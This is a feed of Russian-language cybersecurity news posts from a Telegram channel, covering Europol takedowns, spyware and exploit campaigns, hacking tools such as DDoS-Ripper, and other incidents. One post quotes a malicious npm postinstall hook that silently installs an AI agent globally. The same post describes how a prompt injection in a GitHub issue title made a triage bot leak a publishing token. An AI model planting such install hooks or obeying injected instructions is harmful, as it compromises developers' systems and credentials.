Операция Project Compass, которую координировал Европол, длилась более года и привела к 30 арестам и установлению личностей 179 подозреваемых, связанных с The Com
The Com (The Community) — разрозненная сеть хакеров и киберпреступников, преимущественно состоящая из англоязычных подростков, которые координируются через множество Discord- и Telegram-каналов.
Операция началась в январе 2025 года, ее возглавил Европейский центр по борьбе с терроризмом, и к расследованию присоединились правоохранительные органы из 28 стран.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Онлайн-реклама работает через мгновенные аукционы: данные пользователя (геолокация, IP-адрес, рекламный ID устройства) автоматически рассылаются множеству компаний.
Государственные агентства США покупают базы с геолокацией смартфонов. Эти данные собираются обычными приложениями — играми, фитнес-трекерами, погодными сервисами.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В хакере почему-то проснулась совесть и он вернул жертве 116 000 TON, оставив себе 10 000 TON (~$17 000), подписав транзакцию:
Простите, но это слишком много. Пожалуйста, заберите это обратно — я знаю, что это серьезные деньги. Мир.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12
Группировка Z-Pentest Alliance заявила о получении административного доступа к системам управления насосным оборудованием на ряде объектов критической инфраструктуры Израиля.
Им удалось получить полный контроль над HMI-системой, используемой для управления оборудованием.
Хакеры получили возможность просматривать элементы инфраструктуры и изменять параметры работы оборудования, включая настройки двигателя водяного насоса.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥1
Для заражения достаточно просто зайти на сайт — JavaScript определяет модель айфона и версию ОС, после чего подбирает нужную цепочку атак, которая моментально отдает телефон в лапы хакеров.
После этого скрипт опустошает все криптокошельки жертвы, а в отдельных случаях — и банковские счета.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4🤯2❤1
В московских дворах мошенники ставят устройства с SIM-картами в шлагбаумы и продают доступ к парковкам.
Жители находят чужие машины у себя во дворе, а покупатели получают номер для открытия шлагбаума.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6👎1
DDoS-Ripper — инструмент для тестирования сети, который имитирует атаки Distributed Denial of Service (DDoS).
Он генерирует высокие объёмы HTTP-запросов с одной машины с помощью нескольких параллельных потоков
DDoS-Ripper совместим с несколькими платформами, включая Linux, Windows, MacOS и Termux
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Исследователи Anthropic на протяжении двух недель использовали Claude Opus 4.5 для поиска уязвимостей в Firefox.
Суммарно LLM просканировала почти 6000 файлов с кодом на языке C++ и отправила 112 отчетов о проблемах.
Большую их часть команда браузера исправила в версии Firefox 148, которая вышла в феврале.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
17 февраля в репозитории npm была опубликована версия
cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт.Лишь в файле
package.json притаилась одна лишняя строчка:"postinstall": "npm install -g openclaw@latest"
В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw.Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.
Весь фокус в том, как именно злоумышленник раздобыл npm-токен — он просто спрятал инструкцию (промпт) прямо в заголовке тикета на GitHub.
Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
В статье рассказали о лучших практиках безопасности DNS — от базового управления сервером до использования шифрования и блокировки вредоносных сайтов.
Вы узнаете, как защитить целостность и конфиденциальность ваших служб разрешения имён и обеспечить надёжное функционирование сети.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
В этом видео автор на своём 10-летнем опыте ИБ-специалиста, рассказал, что бы он мог сделать иначе, если бы обладал теми знанями, которые имеет сейчас.
Вы узнаете о 5 самых распространенных ошибках в обучении и получите практические советы, как их точно суметь избежать.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Коллекция для пентестеров, кибербезопасников, системных и сетевых админов, и DevOps-инженеров.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1
Рассказываем, как Гэри Маккиннон в одиночку совершил одну из самых крупных и технически сложных кибератак на военные и космические сети США и причём тут НЛО.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
3 и 4 марта ФБР совместно с правоохранителями из 14 стран провело скоординированную Европолом операцию по захвату LeakBase — он действовал с 2021 года и насчитывалось более 142 тыс. участников.
Было конфисковано два домена, а также правоохранители получили полную базу данных ресурса, включая аккаунты пользователей, публикации, приватные сообщения и IP-логи.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В статье рассказали о такой опасности, как SIM-swapping и поделились мерами для ее предотвращения.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Международная операция, координируемая Европолом, нарушила работу Tycoon2FA — одной из крупнейших фишинговых платформ, работавших по модели фишинг-как-услуга (phishing-as-a-service, PhaaS)
На долю Tycoon2FA приходилось 60% всех заблокированных фишинговых атак
Жертвами платформы стали почти 100 000 организаций по всему миру, в том числе госучреждения, школы и медицинские организации.
В ходе операции правоохранители изъяли 330 доменов, включая панели управления и фишинговые страницы.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
WAFW00F — инструмент для идентификации продуктов защиты веб-приложений (файерволов веб-приложений, WAF).
WAF — система, которая устанавливается перед веб-сервером. Она помогает обнаружить и заблокировать различные виды атак на веб-приложения.
Работает путём отправки специально сформированных HTTP-запросов на целевой сайт и анализа ответов, чтобы определить, есть ли там WAF, а также версию и производителя используемого фильтра.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Пока Маск оптимизировал расходы, его сотрудник оптимизировал «доступ уровня бога», скачав реестры Numident и Master Death File.
Схема года от «ликвидатора бюрократии»:
— Скачать данные на USB-носитель перед увольнением;
— Попытаться «санировать» их на домашнем ПК для работы в частной конторе;
— «В случае провала — просто ждать президентского помилования» (буквальная цитата)
SSA, конечно, делает вид, что всё под контролем.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥2😁2
В этом видео показали инструменты для повышения продуктивности и удобства при работе с Linux.
Большинство инструментов могут работать как и на Windows, так и на MacOS.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
ФБР пытается установить личности лиц, пострадавших после установки одной из вредоносных игр в Steam с мая 2024 года по январь 2026 года.
В рамках расследования бюро выявило несколько вредоносных игр: BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi и Tokenova.
Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔2👍1